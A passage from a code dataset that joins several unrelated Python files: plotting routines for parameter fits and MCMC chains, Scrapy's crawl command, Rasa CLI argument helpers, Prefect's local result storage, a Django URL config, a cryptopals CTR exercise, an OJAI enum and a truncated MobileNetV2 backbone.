    var_names = [name[2] for name in split_names]
    to_be_combined = [var_names]
    if model:
        to_be_combined.insert(0, models)
    if source:
        to_be_combined.insert(0, sources)
    var_names = [' '.join(tbc) for tbc in zip(*to_be_combined)]
    # Make the plots on the diagonal: plot the chisquare/likelihood
    # for the best fitting values while setting one parameter to
    # a fixed value.
    saved_params = copy.deepcopy(fitter.lmpars)
    for i in range(no_params):
        params = copy.deepcopy(saved_params)
        ranges[param_names[i]] = {}
        # Set the y-ticklabels.
        ax = axes[i, i]
        ax.set_title(param_names[i])
        if i == no_params-1:
            if method.lower().startswith('chisquare'):
                ax.set_ylabel(r'$\Delta\chi^2$')
            else:
                ax.set_ylabel(r'$\Delta\mathcal{L}$')
                # NOTE(review): fit_kws is only switched to likelihood mode on
                # the last diagonal iteration -- confirm this is intentional.
                fit_kws['llh_selected'] = True
        # Select starting point to determine error widths.
        value = orig_params[param_names[i]].value
        stderr = orig_params[param_names[i]].stderr
        # Fall back to 1% of the value when no (or zero) stderr is available.
        stderr = stderr if stderr is not None else 0.01 * np.abs(value)
        stderr = stderr if stderr != 0 else 0.01 * np.abs(value)
        right = value + stderr
        left = value - stderr
        params[param_names[i]].vary = False
        # Scan +/- 3 stderr around the best-fit value.
        ranges[param_names[i]]['left_val'] = 3*left - 2*value
        ranges[param_names[i]]['right_val'] = 3*right - 2*value
        value_range = np.linspace(3*left - 2*value, right*3 - 2*value, resolution_diag)
        chisquare = np.zeros(len(value_range))
        # Calculate the new value, and store it in the array. Update the progressbar.
        # with tqdm.tqdm(value_range, desc=param_names[i], leave=True) as pbar:
        for j, v in enumerate(value_range):
            params[param_names[i]].value = v
            fitter.lmpars = params
            fitter.fit(prepFit=False, **fit_kws)
            if fitter.llh_result is not None:
                chisquare[j] = fitter.llh_result - orig_value
            else:
                chisquare[j] = fitter.chisqr - orig_value
            # pbar.update(1)
        # Plot the result
        ax.plot(value_range, chisquare, color='k')
        c = '#0093e6'
        ax.axvline(right, ls="dashed", color=c)
        ax.axvline(left, ls="dashed", color=c)
        ax.axvline(value, ls="dashed", color=c)
        # Format the title as value with asymmetric-looking errors.
        # NOTE(review): up and down use the same (value, stderr) pair, so the
        # quoted +/- errors are identical here.
        up = '{:.2ug}'.format(u.ufloat(value, stderr))
        down = '{:.2ug}'.format(u.ufloat(value, stderr))
        val = up.split('+/-')[0].split('(')[-1]
        r = up.split('+/-')[1].split(')')[0]
        l = down.split('+/-')[1].split(')')[0]
        if 'e' in up or 'e' in down:
            ex = up.split('e')[-1]
            ax.set_title(title_e.format(var_names[i], val, l, r, ex))
        else:
            ax.set_title(title.format(var_names[i], val, l, r))
    # Restore the parameters.
    fitter.lmpars = orig_params
    # Off-diagonal maps: fix two parameters on a grid and refit the rest.
    for i, j in zip(*np.tril_indices_from(axes, -1)):
        params = copy.deepcopy(orig_params)
        ax = axes[i, j]
        x_name = param_names[j]
        y_name = param_names[i]
        if j == 0:
            ax.set_ylabel(var_names[i])
        if i == no_params - 1:
            ax.set_xlabel(var_names[j])
        right = ranges[x_name]['right_val']
        left = ranges[x_name]['left_val']
        x_range = np.linspace(left, right, resolution_map)
        right = ranges[y_name]['right_val']
        left = ranges[y_name]['left_val']
        y_range = np.linspace(left, right, resolution_map)
        X, Y = np.meshgrid(x_range, y_range)
        Z = np.zeros(X.shape)
        i_indices, j_indices = np.indices(Z.shape)
        params[param_names[i]].vary = False
        params[param_names[j]].vary = False
        for k, l in zip(i_indices.flatten(), j_indices.flatten()):
            x = X[k, l]
            y = Y[k, l]
            params[param_names[j]].value = x
            params[param_names[i]].value = y
            fitter.lmpars = params
            fitter.fit(prepFit=False, **fit_kws)
            if fitter.llh_result is not None:
                # Factor 2 converts a delta-loglikelihood to a chisquare scale.
                Z[k, l] = (fitter.llh_result - orig_value)*2
            else:
                Z[k, l] = fitter.chisqr - orig_value
        Z = -Z
        # Contour levels at the 1/2/3-sigma delta-chisquare boundaries,
        # obtained by inverting the chi2 CDF for one degree of freedom.
        bounds = []
        for bound in [0.997300204, 0.954499736, 0.682689492]:
            chifunc = lambda x: chi2.cdf(x, 1) - bound  # Calculate 1 sigma boundary
            bounds.append(-optimize.root(chifunc, 1).x[0])
        bounds.append(0)
        bounds = np.array(bounds)
        norm = mpl.colors.BoundaryNorm(bounds, invcmap.N)
        contourset = ax.contourf(X, Y, Z, bounds, cmap=invcmap, norm=norm)
        fitter.lmpars = copy.deepcopy(orig_params)
    try:
        cbar = plt.colorbar(contourset, cax=cbar, orientation='vertical')
        cbar.ax.yaxis.set_ticks([-7.5, -4.5, -1.5])
        cbar.ax.set_yticklabels([r'3$\sigma$', r'2$\sigma$', r'1$\sigma$'])
    except:
        pass
    # Thin out tick labels to avoid overlapping text.
    for a in axes.flatten():
        if a is not None:
            for label in a.get_xticklabels()[::2]:
                label.set_visible(False)
            for label in a.get_yticklabels()[::2]:
                label.set_visible(False)
    # Restore the original converged fit state on the fitter.
    fitter.result = result
    fitter.updateInfo()
    return fig, axes, cbar
def generateCorrelationPlot(filename, filter=None, bins=None, selection=(0, 100), source=False, model=True):
    """Given the random walk data, creates a triangle plot: distribution of
    a single parameter on the diagonal axes, 2D contour plots with 1, 2 and
    3 sigma contours on the off-diagonal. The 1-sigma limits based on the
    percentile method are also indicated, as well as added to the title.

    Parameters
    ----------
    filename: string
        Filename for the h5 file containing the data from the walk.
    filter: list of str, optional
        If supplied, only this list of columns is used for the plot.
    bins: int or list of int, optional
        If supplied, use this number of bins for the plotting.
    selection: tuple of two percentages, optional
        Slice of the chain (as percentages of its length) to include.
    source: boolean, optional
        When True, prefix labels with the data-source name.
    model: boolean, optional
        When True, prefix labels with the model name.

    Returns
    -------
    figure
        Returns the MatPlotLib figure created."""
    reader = SATLASHDFBackend(filename)
    var_names = list(reader.labels)
    # Labels follow the 'source___model___parameter' convention.
    split_names = [name.split('___') for name in var_names]
    sources = [name[0]+'\n' for name in split_names]
    models = [name[1] for name in split_names]
    var_names = [name[2] for name in split_names]
    to_be_combined = [var_names]
    if model:
        to_be_combined.insert(0, models)
    if source:
        to_be_combined.insert(0, sources)
    var_names = [' '.join(tbc) for tbc in zip(*to_be_combined)]
    # Chain has shape (steps, walkers, parameters); slice by percentage,
    # then flatten steps and walkers together.
    data = reader.get_chain(flat=False)
    dataset_length = data.shape[0]
    first, last = int(np.floor(dataset_length/100*selection[0])), int(np.ceil(dataset_length/100*selection[1]))
    data = data[first:last, :, :]
    data = data.reshape(-1, data.shape[-1])
    if filter is not None:
        # Keep every column whose name contains one of the filter strings.
        filter = [c for f in filter for c in var_names if f in c]
    else:
        filter = var_names
    with tqdm.tqdm(total=len(filter)+(len(filter)**2-len(filter))/2, leave=True) as pbar:
        fig, axes, cbar = _make_axes_grid(len(filter), axis_padding=0)
        metadata = {}
        if not isinstance(bins, list):
            bins = [bins for _ in filter]
        # Diagonal: 1D histogram per parameter with percentile markers.
        for i, val in enumerate(filter):
            pbar.set_description(val)
            ax = axes[i, i]
            bin_index = i
            i = var_names.index(val)
            x = data[:, i]
            if bins[bin_index] is None:
                width = 3.5*np.std(x)/x.size**(1/3) #Scott's rule for binwidth
                bins[bin_index] = np.arange(x.min(), x.max()+width, width)
            try:
                n, b, p, = ax.hist(x, int(bins[bin_index]), histtype='step', color='k')
            except TypeError:
                # Non-integer bin spec (e.g. an ndarray of edges): fall back.
                bins[bin_index] = 50
                n, b, p, = ax.hist(x, int(bins[bin_index]), histtype='step', color='k')
            # center = n.argmax()
            # q50 = (b[center] + b[center+1])/2
            # 15.87/84.13 percentiles correspond to the 1-sigma interval.
            q = [15.87, 50, 84.13]
            q16, q50, q84 = np.percentile(x, q)
            metadata[val] = {'bins': bins[bin_index], 'min': x.min(), 'max': x.max()}
            title = '{}\n${}_{{-{}}}^{{+{}}}$'
            title_e = '{}\n$({}_{{-{}}}^{{+{}}})e{}$'
            up = '{:.2ug}'.format(u.ufloat(q50, np.abs(q84-q50)))
            down = '{:.2ug}'.format(u.ufloat(q50, np.abs(q50-q16)))
            param_val = up.split('+/-')[0].split('(')[-1]
            r = up.split('+/-')[1].split(')')[0]
            l = down.split('+/-')[1].split(')')[0]
            if 'e' in up or 'e' in down:
                ex = up.split('e')[-1]
                ax.set_title(title_e.format(val, param_val, l, r, ex))
            else:
                ax.set_title(title.format(val, param_val, l, r))
            qvalues = [q16, q50, q84]
            c = '#0093e6'
            for q in qvalues:
                ax.axvline(q, ls="dashed", color=c)
            ax.set_yticks([])
            ax.set_yticklabels([])
            pbar.update(1)
        # Off-diagonal: 2D histograms with 1/2/3-sigma contour levels.
        for i, j in zip(*np.tril_indices_from(axes, -1)):
            x_name = filter[j]
            y_name = filter[i]
            pbar.set_description(', '.join([x_name, y_name]))
            ax = axes[i, j]
            if j == 0:
                ax.set_ylabel(filter[i])
            if i == len(filter) - 1:
                ax.set_xlabel(filter[j])
            j = var_names.index(x_name)
            i = var_names.index(y_name)
            x = data[:, j]
            y = data[:, i]
            x_min, x_max, x_bins = metadata[x_name]['min'], metadata[x_name]['max'], metadata[x_name]['bins']
            y_min, y_max, y_bins = metadata[y_name]['min'], metadata[y_name]['max'], metadata[y_name]['bins']
            X = np.linspace(x_min, x_max, x_bins + 1)
            Y = np.linspace(y_min, y_max, y_bins + 1)
            H, X, Y = np.histogram2d(x.flatten(), y.flatten(), bins=(X, Y),
                                     weights=None)
            X1, Y1 = 0.5 * (X[1:] + X[:-1]), 0.5 * (Y[1:] + Y[:-1])
            X, Y = X[:-1], Y[:-1]
            # Normalize the histogram, then find the density levels that
            # enclose the 1/2/3-sigma probability mass (corner-plot style).
            H = (H - H.min()) / (H.max() - H.min())
            Hflat = H.flatten()
            inds = np.argsort(Hflat)[::-1]
            Hflat = Hflat[inds]
            sm = np.cumsum(Hflat)
            sm /= sm[-1]
            levels = 1.0 - np.exp(-0.5 * np.arange(1, 3.1, 1) ** 2)
            V = np.empty(len(levels))
            for i, v0 in enumerate(levels):
                try:
                    V[i] = Hflat[sm <= v0][-1]
                except:
                    V[i] = Hflat[0]
            bounds = np.unique(np.concatenate([[H.max()], V])[::-1])
            norm = mpl.colors.BoundaryNorm(bounds, invcmap.N)
            contourset = ax.contourf(X1, Y1, H.T, bounds, cmap=invcmap, norm=norm)
            pbar.update(1)
    try:
        cbar = plt.colorbar(contourset, cax=cbar, orientation='vertical')
        cbar.ax.yaxis.set_ticks([0, 1/6, 0.5, 5/6])
        cbar.ax.set_yticklabels(['', r'3$\sigma$', r'2$\sigma$', r'1$\sigma$'])
    except:
        cbar = None
    return fig, axes, cbar
def generateWalkPlot(filename, filter=None, selection=(0, 100), walkers=20, source=False, model=True):
    """Given the random walk data, the random walk for the selected parameters
    is plotted.

    Parameters
    ----------
    filename: string
        Filename for the h5 file containing the data from the walk.
    filter: list of str, optional
        If supplied, only this list of parameters is used for the plot.

    Returns
    -------
    figure
        Returns the MatPlotLib figure created."""
    # NOTE(review): the `walkers` argument is accepted but never used in this body.
    reader = SATLASHDFBackend(filename)
    var_names = reader.labels
    # Labels are stored as 'source___model___parameter'; split the three parts.
    split_names = [name.split('___') for name in var_names]
    sources = [name[0] for name in split_names]
    models = [name[1] for name in split_names]
    var_names = [name[2] for name in split_names]
    # Optionally prefix parameter names with their model and/or source name.
    to_be_combined = [var_names]
    if model:
        to_be_combined.insert(0, models)
    if source:
        to_be_combined.insert(0, sources)
    var_names = [' '.join(tbc) for tbc in zip(*to_be_combined)]
    data = reader.get_chain(flat=False)
    dataset_length = data.shape[0]
    # `selection` is a (start, stop) pair expressed in percent of the chain length.
    first, last = int(np.floor(dataset_length/100*selection[0])), int(np.ceil(dataset_length/100*selection[1]))
    data = data[first:last, :, :]
    # data = data.reshape(-1, data.shape[-1])
    if filter is not None:
        # Keep every column whose combined name contains one of the filter strings.
        filter = [c for f in filter for c in var_names if f in c]
    else:
        filter = var_names
    with tqdm.tqdm(total=len(filter), leave=True) as pbar:
        fig, axes = plt.subplots(len(filter), 1, sharex=True)
        for i, (val, ax) in enumerate(zip(filter, axes)):
            pbar.set_description(val)
            # Re-resolve the column index: `filter` may be reduced or reordered.
            i = var_names.index(val)
            x = data[:, :, i]
            q50 = np.percentile(x, [50.0])
            # One grey trace per walker, with the median drawn on top in black.
            ax.plot(range(first, last), x, alpha=0.3, color='gray')
            ax.set_ylabel(val)
            ax.axhline(q50, color='k')
            pbar.update(1)
        ax.set_xlabel('Step')
        pbar.close()
    return fig, axes
| 39.6 | 180 | 0.583284 |
a488a56d08886c8b69cff1bb580027a6c37eaca4 | 1,085 | py | Python | scrapy/commands/crawl.py | ZhiShiMao/scrapy | 04dd29257a81be0b1291db61dd880ef3dd96127d | [
"BSD-3-Clause"
] | null | null | null | scrapy/commands/crawl.py | ZhiShiMao/scrapy | 04dd29257a81be0b1291db61dd880ef3dd96127d | [
"BSD-3-Clause"
] | null | null | null | scrapy/commands/crawl.py | ZhiShiMao/scrapy | 04dd29257a81be0b1291db61dd880ef3dd96127d | [
"BSD-3-Clause"
] | null | null | null | from scrapy.commands import BaseRunSpiderCommand
from scrapy.exceptions import UsageError
class Command(BaseRunSpiderCommand):
    """`scrapy crawl` command: run exactly one spider inside the project."""

    requires_project = True

    def syntax(self):
        return "[options] <spider>"

    def short_desc(self):
        return "Run a spider"

    def run(self, args, opts):
        """Schedule the requested spider and start the crawler process.

        Sets ``self.exitcode`` to 1 when crawling fails early, when
        bootstrap fails, or when the process recorded an exception.
        """
        if not args:
            raise UsageError()
        if len(args) > 1:
            raise UsageError(
                "running 'scrapy crawl' with more than one spider is no longer supported"
            )
        spider_name = args[0]
        deferred = self.crawler_process.crawl(spider_name, **opts.spargs)
        # A deferred that already carries an Exception result means the crawl
        # could not even be scheduled — fail without starting the reactor.
        failed_early = getattr(deferred, "result", None) is not None and issubclass(
            deferred.result.type, Exception
        )
        if failed_early:
            self.exitcode = 1
            return
        self.crawler_process.start()
        process = self.crawler_process
        if process.bootstrap_failed or (
            hasattr(process, "has_exception") and process.has_exception
        ):
            self.exitcode = 1
| 27.820513 | 89 | 0.586175 |
41f193247bbfb9f7759ae522e3e6a47f40d8d379 | 3,800 | py | Python | rasa/cli/arguments/default_arguments.py | gthb/rasa | 9c3affff47496b6e8848d41acf5ab885b7037c30 | [
"Apache-2.0"
] | null | null | null | rasa/cli/arguments/default_arguments.py | gthb/rasa | 9c3affff47496b6e8848d41acf5ab885b7037c30 | [
"Apache-2.0"
] | null | null | null | rasa/cli/arguments/default_arguments.py | gthb/rasa | 9c3affff47496b6e8848d41acf5ab885b7037c30 | [
"Apache-2.0"
] | null | null | null | import argparse
import logging
from typing import Text, Union, Optional
from rasa.constants import (
DEFAULT_DATA_PATH,
DEFAULT_MODELS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_CONFIG_PATH,
)
def add_model_param(
    parser: argparse.ArgumentParser,
    model_name: Text = "Rasa",
    add_positional_arg: bool = True,
    default: Optional[Text] = DEFAULT_MODELS_PATH,
):
    """Attach the trained-model path option (and optional positional form)."""
    description = (
        "Path to a trained {} model. If a directory is specified, it will "
        "use the latest model in this directory.".format(model_name)
    )
    parser.add_argument("-m", "--model", type=str, default=default, help=description)
    if not add_positional_arg:
        return
    parser.add_argument(
        "model-as-positional-argument", nargs="?", type=str, help=description
    )
def add_stories_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
    stories_name: Text = "training",
) -> None:
    """Register the ``-s/--stories`` option on ``parser``."""
    story_help = "File or folder containing your {} stories.".format(stories_name)
    parser.add_argument(
        "-s", "--stories",
        type=str,
        default=DEFAULT_DATA_PATH,
        help=story_help,
    )
def add_nlu_data_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
    help_text: Text,
    default: Optional[Text] = DEFAULT_DATA_PATH,
):
    """Register the ``-u/--nlu`` data-path option on ``parser``."""
    parser.add_argument(
        "-u",
        "--nlu",
        type=str,
        default=default,
        help=help_text,
    )
def add_domain_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer]
):
    """Register the ``-d/--domain`` option on ``parser``."""
    parser.add_argument(
        "-d", "--domain",
        type=str,
        default=DEFAULT_DOMAIN_PATH,
        help="Domain specification (yml file).",
    )
def add_config_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
    default: Optional[Text] = DEFAULT_CONFIG_PATH,
):
    """Register the ``-c/--config`` option on ``parser``."""
    parser.add_argument(
        "-c", "--config",
        type=str,
        default=default,
        help="The policy and NLU pipeline configuration of your bot.",
    )
def add_out_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
    help_text: Text,
    default: Optional[Text] = DEFAULT_MODELS_PATH,
    required: bool = False,
):
    """Register the ``--out`` output-path option on ``parser``."""
    parser.add_argument(
        "--out",
        type=str,
        default=default,
        help=help_text,
        required=required,
    )
def add_endpoint_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer], help_text: Text
):
    """Register the ``--endpoints`` option on ``parser`` (no default file)."""
    parser.add_argument(
        "--endpoints",
        type=str,
        default=None,
        help=help_text,
    )
def add_data_param(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
    default: Optional[Text] = DEFAULT_MODELS_PATH,
    required: bool = False,
    data_type: Text = "Rasa ",
):
    """Register the ``--data`` option on ``parser``."""
    data_help = "Path to the file or directory containing {}data.".format(data_type)
    parser.add_argument(
        "--data",
        type=str,
        default=default,
        help=data_help,
        required=required,
    )
def add_logging_options(parser: argparse.ArgumentParser):
    """Add options to an argument parser to configure logging levels."""
    group = parser.add_argument_group("Python Logging Options")
    # Every flag stores a logging level constant into the shared `loglevel`
    # destination; the last flag given on the command line wins.
    level_flags = [
        (("-v", "--verbose"), "Be verbose. Sets logging level to INFO.", logging.INFO),
        (
            ("-vv", "--debug"),
            "Print lots of debugging statements. Sets logging level to DEBUG.",
            logging.DEBUG,
        ),
        (("--quiet",), "Be quiet! Sets logging level to WARNING.", logging.WARNING),
    ]
    for flags, description, level in level_flags:
        group.add_argument(
            *flags,
            help=description,
            action="store_const",
            dest="loglevel",
            const=level,
        )
| 27.737226 | 87 | 0.66 |
2e5f87f573d4040bc53c23ab832fd34ae6dbe568 | 3,694 | py | Python | src/prefect/engine/results/local_result.py | louisditzel/prefect | b1a02fee623b965e756a38aa09059db780ab67eb | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/prefect/engine/results/local_result.py | louisditzel/prefect | b1a02fee623b965e756a38aa09059db780ab67eb | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/prefect/engine/results/local_result.py | louisditzel/prefect | b1a02fee623b965e756a38aa09059db780ab67eb | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import os
from typing import Any
import cloudpickle
from prefect import config
from prefect.engine.result import Result
class LocalResult(Result):
    """
    Result that is written to and retrieved from the local file system.

    Args:
        - dir (str, optional): the _absolute_ path to a directory for storing
            all results; defaults to `${prefect.config.home_dir}/results`
        - validate_dir (bool, optional): a boolean specifying whether to validate the
            provided directory path; if `True`, the directory will be converted to an
            absolute path and created. Defaults to `True`
        - **kwargs (Any, optional): any additional `Result` initialization options
    """

    def __init__(
        self, dir: str = None, validate_dir: bool = True, **kwargs: Any
    ) -> None:
        prefect_home = os.path.abspath(config.home_dir)
        # Use "<home_dir>/results" when no directory was given, or when the
        # given directory lives inside the Prefect home directory.
        within_home = dir is None or (
            os.path.commonpath([prefect_home, os.path.abspath(dir)]) == prefect_home
        )
        chosen_dir = os.path.join(config.home_dir, "results") if within_home else dir
        if validate_dir:
            # Normalize to an absolute path and make sure it exists on disk.
            chosen_dir = os.path.abspath(os.path.expanduser(chosen_dir))
            if not os.path.exists(chosen_dir):
                os.makedirs(chosen_dir)
        self.dir = chosen_dir
        super().__init__(**kwargs)

    def read(self, location: str) -> Result:
        """
        Reads a result from the local file system and returns the corresponding `Result` instance.

        Args:
            - location (str): the location to read from

        Returns:
            - Result: a new result instance with the data represented by the location
        """
        loaded = self.copy()
        loaded.location = location
        self.logger.debug("Starting to read result from {}...".format(location))
        with open(os.path.join(self.dir, location), "rb") as source:
            loaded.value = cloudpickle.loads(source.read())
        self.logger.debug("Finished reading result from {}...".format(location))
        return loaded

    def write(self, value: Any, **kwargs: Any) -> Result:
        """
        Writes the result to a location in the local file system and returns a new `Result`
        object with the result's location.

        Args:
            - value (Any): the value to write; will then be stored as the `value` attribute
                of the returned `Result` instance
            - **kwargs (optional): if provided, will be used to format the location template
                to determine the location to write to

        Returns:
            - Result: returns a new `Result` with both `value` and `location` attributes
        """
        stored = self.format(**kwargs)
        stored.value = value
        self.logger.debug("Starting to upload result to {}...".format(stored.location))
        serialized = cloudpickle.dumps(stored.value)
        with open(os.path.join(self.dir, stored.location), "wb") as sink:
            sink.write(serialized)
        self.logger.debug("Finished uploading result to {}...".format(stored.location))
        return stored

    def exists(self, location: str) -> bool:
        """
        Checks whether the target result exists in the file system.

        Does not validate whether the result is `valid`, only that it is present.

        Args:
            - location (str): Location of the result in the specific result target.
                Will check whether the provided location exists

        Returns:
            - bool: whether or not the target result exists
        """
        target = os.path.join(self.dir, location)
        return os.path.exists(target)
| 34.203704 | 98 | 0.610179 |
82a9bbea57921a1e2e35c30897eab54f4e0ae832 | 266 | py | Python | project_b/project_b/urls.py | pdessauw/core-framework-demo | 27d2c1704b92e40220e062c30a4f40ff1f9ce674 | [
"MIT"
] | null | null | null | project_b/project_b/urls.py | pdessauw/core-framework-demo | 27d2c1704b92e40220e062c30a4f40ff1f9ce674 | [
"MIT"
] | null | null | null | project_b/project_b/urls.py | pdessauw/core-framework-demo | 27d2c1704b92e40220e062c30a4f40ff1f9ce674 | [
"MIT"
] | null | null | null | from django.conf.urls import include, url
from django.contrib import admin
import test_views
# URL routes are matched top to bottom; the catch-all r'^' pattern must stay
# last so it only receives requests no earlier pattern claimed.
urlpatterns = [
    url(r'^test$', test_views.template_test, name="test"),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^', include("core_website.urls")),
]
| 20.461538 | 58 | 0.691729 |
832bb5583370dda17f42134290f455c1b2ae0ad3 | 697 | py | Python | set3/fixed_nonce_ctr_substitutions.py | adbforlife/cryptopals | 18bbc39e73f6a76725e792ec74b29cbcc8868409 | [
"MIT"
] | null | null | null | set3/fixed_nonce_ctr_substitutions.py | adbforlife/cryptopals | 18bbc39e73f6a76725e792ec74b29cbcc8868409 | [
"MIT"
] | null | null | null | set3/fixed_nonce_ctr_substitutions.py | adbforlife/cryptopals | 18bbc39e73f6a76725e792ec74b29cbcc8868409 | [
"MIT"
] | null | null | null | import sys
sys.path.append('/Users/ADB/Desktop/ /cryptopals')
from cryptotools import *
from base64 import b64decode
# Random AES key shared by every ciphertext below; reusing it (with a fixed
# nonce) across messages is the weakness this exercise exploits.
key = generate_key()
# Doing this by hand in an unsystematic way is worse than solving repeated key
# xors, which we use here.
if __name__ == '__main__':
    ms = []
    # Each line of set3/19.txt is a base64-encoded plaintext.
    with open('set3/19.txt', 'r') as f:
        ms = list(map(lambda x: b64decode(x.rstrip()), f.readlines()))
    # Encrypt every plaintext under the same key (fixed-nonce CTR).
    cs = list(map(lambda x: aes_ctr_encrypt(x, key), ms))
    # Truncate all ciphertexts to the shortest one so keystream bytes line up,
    # turning the problem into a repeating-key XOR.
    min_len = min(list(map(lambda x: len(x), cs)))
    cs1 = list(map(lambda x: x[:min_len], cs))
    print(len(b''.join(cs1)))
    # NOTE(review): this rebinds `key`, shadowing the AES key above — from here
    # on `key` holds the recovered keystream guess, not the encryption key.
    key = repeating_xor_guess_key(b''.join(cs1), len(cs1[0]))
    print(len(cs1[0]))
    print(len(key))
    print(repeating_xor(b''.join(cs1), key))
| 30.304348 | 78 | 0.681492 |
733d364c567f125eb68ce5e1331e4f94ac2d5ad3 | 427 | py | Python | mapr/ojai/ojai_query/QueryOp.py | mapr/maprdb-python-client | ea7b7f1fb6c212e76bd799867e272eafd345f2e2 | [
"Apache-2.0"
] | 3 | 2020-04-01T12:01:50.000Z | 2022-03-23T01:18:36.000Z | mapr/ojai/ojai_query/QueryOp.py | mapr/maprdb-python-client | ea7b7f1fb6c212e76bd799867e272eafd345f2e2 | [
"Apache-2.0"
] | 7 | 2019-02-10T19:31:09.000Z | 2022-02-08T17:04:17.000Z | mapr/ojai/ojai_query/QueryOp.py | mapr/maprdb-python-client | ea7b7f1fb6c212e76bd799867e272eafd345f2e2 | [
"Apache-2.0"
] | 3 | 2020-05-27T09:52:32.000Z | 2021-09-07T14:16:43.000Z | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
from aenum import Enum
class QueryOp(Enum):
    """Comparison operators accepted by OJAI query conditions.

    Each member's value is the literal operator token used in the OJAI
    JSON query syntax (e.g. ``{"$lt": ...}``).
    """
    LESS = "$lt"
    LESS_OR_EQUAL = "$le"
    EQUAL = "$eq"
    NOT_EQUAL = "$ne"
    GREATER_OR_EQUAL = "$ge"
    GREATER = "$gt"
| 17.791667 | 39 | 0.737705 |
6962bce14a1ad8fff06af0756f0987ee3db3a65b | 7,445 | py | Python | backbone_nets/mobilenetv2_backbone.py | david1309/SynergyNet_bonseyes | 9d675f6e0c78222e1fa55e6598c3d11aa5dc799b | [
"MIT"
] | null | null | null | backbone_nets/mobilenetv2_backbone.py | david1309/SynergyNet_bonseyes | 9d675f6e0c78222e1fa55e6598c3d11aa5dc799b | [
"MIT"
] | null | null | null | backbone_nets/mobilenetv2_backbone.py | david1309/SynergyNet_bonseyes | 9d675f6e0c78222e1fa55e6598c3d11aa5dc799b | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.hub import load_state_dict_from_url
# Public API of this module.
__all__ = ['MobileNetV2', 'mobilenet_v2']
# Download location of the torchvision ImageNet-pretrained MobileNetV2 weights.
model_urls = {
    'mobilenet_v2': 'https://download.pytorch.org/models/mobilenet_v2-b0353104.pth',
}
def _make_divisible(v, divisor, min_value=None):
"""
This function is taken from the original tf repo.
It ensures that all layers have a channel number that is divisible by 8
It can be seen here:
https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py
:param v:
:param divisor:
:param min_value:
:return:
"""
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
class ConvBNReLU(nn.Sequential):
    """Conv2d -> norm layer (BatchNorm2d by default) -> ReLU6, with 'same' padding."""

    def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1, norm_layer=None):
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        # Pad so that stride-1 convolutions preserve spatial resolution.
        same_padding = (kernel_size - 1) // 2
        conv = nn.Conv2d(
            in_planes, out_planes, kernel_size, stride, same_padding,
            groups=groups, bias=False,
        )
        super(ConvBNReLU, self).__init__(
            conv,
            norm_layer(out_planes),
            nn.ReLU6(inplace=True),
        )
class InvertedResidual(nn.Module):
    """MobileNetV2 inverted-residual block: expand -> depthwise -> project."""

    def __init__(self, inp, oup, stride, expand_ratio, norm_layer=None):
        super(InvertedResidual, self).__init__()
        self.stride = stride
        assert stride in [1, 2]
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        hidden_dim = int(round(inp * expand_ratio))
        # The skip connection is only valid when the block keeps both the
        # spatial resolution and the channel count unchanged.
        self.use_res_connect = self.stride == 1 and inp == oup
        stages = []
        if expand_ratio != 1:
            # pointwise expansion
            stages.append(ConvBNReLU(inp, hidden_dim, kernel_size=1, norm_layer=norm_layer))
        # depthwise convolution
        stages.append(ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer))
        # pointwise-linear projection (no activation)
        stages.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False))
        stages.append(norm_layer(oup))
        self.conv = nn.Sequential(*stages)

    def forward(self, x):
        out = self.conv(x)
        return x + out if self.use_res_connect else out
class MobileNetV2(nn.Module):
    # Backbone with three regression heads (num_ori/num_shape/num_exp outputs);
    # presumably 3DMM pose/shape/expression parameters — TODO confirm with callers.
    def __init__(
        self,
        num_ori = 7,
        num_shape = 199,
        num_exp = 29,
        width_mult=1.0,
        inverted_residual_setting=None,
        round_nearest=8,
        block=None,
        norm_layer=None
    ):
        """
        MobileNet V2 main class
        Args:
            num_ori (int): output size of the orientation head
            num_shape (int): output size of the shape head
            num_exp (int): output size of the expression head
            width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
            inverted_residual_setting: Network structure
            round_nearest (int): Round the number of channels in each layer to be a multiple of this number
            Set to 1 to turn off rounding
            block: Module specifying inverted residual building block for mobilenet
            norm_layer: Module specifying the normalization layer to use
        """
        super(MobileNetV2, self).__init__()
        if block is None:
            block = InvertedResidual
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        input_channel = 32
        last_channel = 1280
        if inverted_residual_setting is None:
            # t, c, n, s: expansion factor, output channels, repeats, first stride.
            inverted_residual_setting = [
                # t, c, n, s
                [1, 16, 1, 1],
                [6, 24, 2, 2],
                [6, 32, 3, 2],
                [6, 64, 4, 2],
                [6, 96, 3, 1],
                [6, 160, 3, 2],
                [6, 320, 1, 1],
            ]
        # only check the first element, assuming user knows t,c,n,s are required
        if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:
            raise ValueError("inverted_residual_setting should be non-empty "
                             "or a 4-element list, got {}".format(inverted_residual_setting))
        # building first layer
        input_channel = _make_divisible(input_channel * width_mult, round_nearest)
        self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
        features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
        # building inverted residual blocks
        for t, c, n, s in inverted_residual_setting:
